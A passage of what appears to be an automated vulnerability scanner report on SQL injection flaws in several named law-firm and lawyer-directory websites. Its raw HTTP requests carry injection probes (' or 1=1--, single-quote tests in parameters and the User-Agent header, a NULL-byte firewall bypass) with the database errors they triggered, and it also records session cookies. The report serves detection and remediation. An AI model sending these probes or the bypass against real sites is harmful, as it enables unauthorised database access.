<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.98. http://www.pillsburylaw.com/scripts/menu.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/menu.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20011542'%20or%201%3d1--%20 and 20011542'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts20011542'%20or%201%3d1--%20/menu.css?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:13:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts20011542'%20or%201%3d2--%20/menu.css?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:13:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...
1.99. http://www.pillsburylaw.com/scripts/menu.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/menu.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14454098'%20or%201%3d1--%20 and 14454098'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/menu.css14454098'%20or%201%3d1--%20?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:13:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts/menu.css14454098'%20or%201%3d2--%20?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:13:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...
1.100. http://www.pomerantzlaw.com/cases.html [CaseID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The CaseID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CaseID parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /cases.html?action=caseDetail&CaseID=102%27%00' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305219554.2; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=182215078.1.10.1305219554; __utmc=182215078

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 17:03:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23300
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Line 2: Incorrect syntax near ''.</td>
...[SNIP]...

Request 2

GET /cases.html?action=caseDetail&CaseID=102%27%00'' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305219554.2; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=182215078.1.10.1305219554; __utmc=182215078

Response 2

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 17:03:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23363
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
1.101. http://www.pomerantzlaw.com/cases.html [CaseID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The CaseID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CaseID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /cases.html?action=caseDetail&CaseID=102' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 17:03:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23366
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Unclosed quotation mark before the character string '102' <br />
...[SNIP]...
1.102. http://www.pomerantzlaw.com/practice-areas.html [PracticeAreaID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pomerantzlaw.com
Path:   /practice-areas.html

Issue detail

The PracticeAreaID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the PracticeAreaID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /practice-areas.html?action=practiceAreaDetail&PracticeAreaID=3' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305219554.2; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=182215078.2.10.1305219554; __utmc=182215078

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 17:04:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23102
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Unclosed quotation mark before the character string '3' <br />
...[SNIP]...
1.103. http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superlawyers.com
Path:   /pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html HTTP/1.1
Host: www.superlawyers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/attorneys.html?mode=view&AID=8
Cookie: sl_session=05c2bcb40ffc909956464cbcf8d1857e

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:36:02 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 491

insert lawyer profile view tracking: 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://layserfreiwald.com/attorneys.html?mode=view&AID=8')' at line 1:: INSERT INTO lawyer_profile_vie
...[SNIP]...

Request 2

GET /pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html HTTP/1.1
Host: www.superlawyers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1''
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/attorneys.html?mode=view&AID=8
Cookie: sl_session=05c2bcb40ffc909956464cbcf8d1857e

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:36:03 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 22960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
1.104. http://www.superlawyers.com/redir [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superlawyers.com
Path:   /redir

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /redir?r=http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&c=150_badge&i=8480c83d-644a-4fd5-9e3b-15644c36fe5e HTTP/1.1
Host: www.superlawyers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/attorneys.html?mode=view&AID=8

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:36:37 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.2
Set-Cookie: sl_session=fdc7e2e2ab89726f93f17512e759fb1e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 647

insert click tracking: 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '150_badge','8480c83d-644a-4fd5-9e3b-15644c36fe5e','http://layserfreiwald.com/att' at line 1:: INSERT I
...[SNIP]...

Request 2

GET /redir?r=http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&c=150_badge&i=8480c83d-644a-4fd5-9e3b-15644c36fe5e HTTP/1.1
Host: www.superlawyers.com
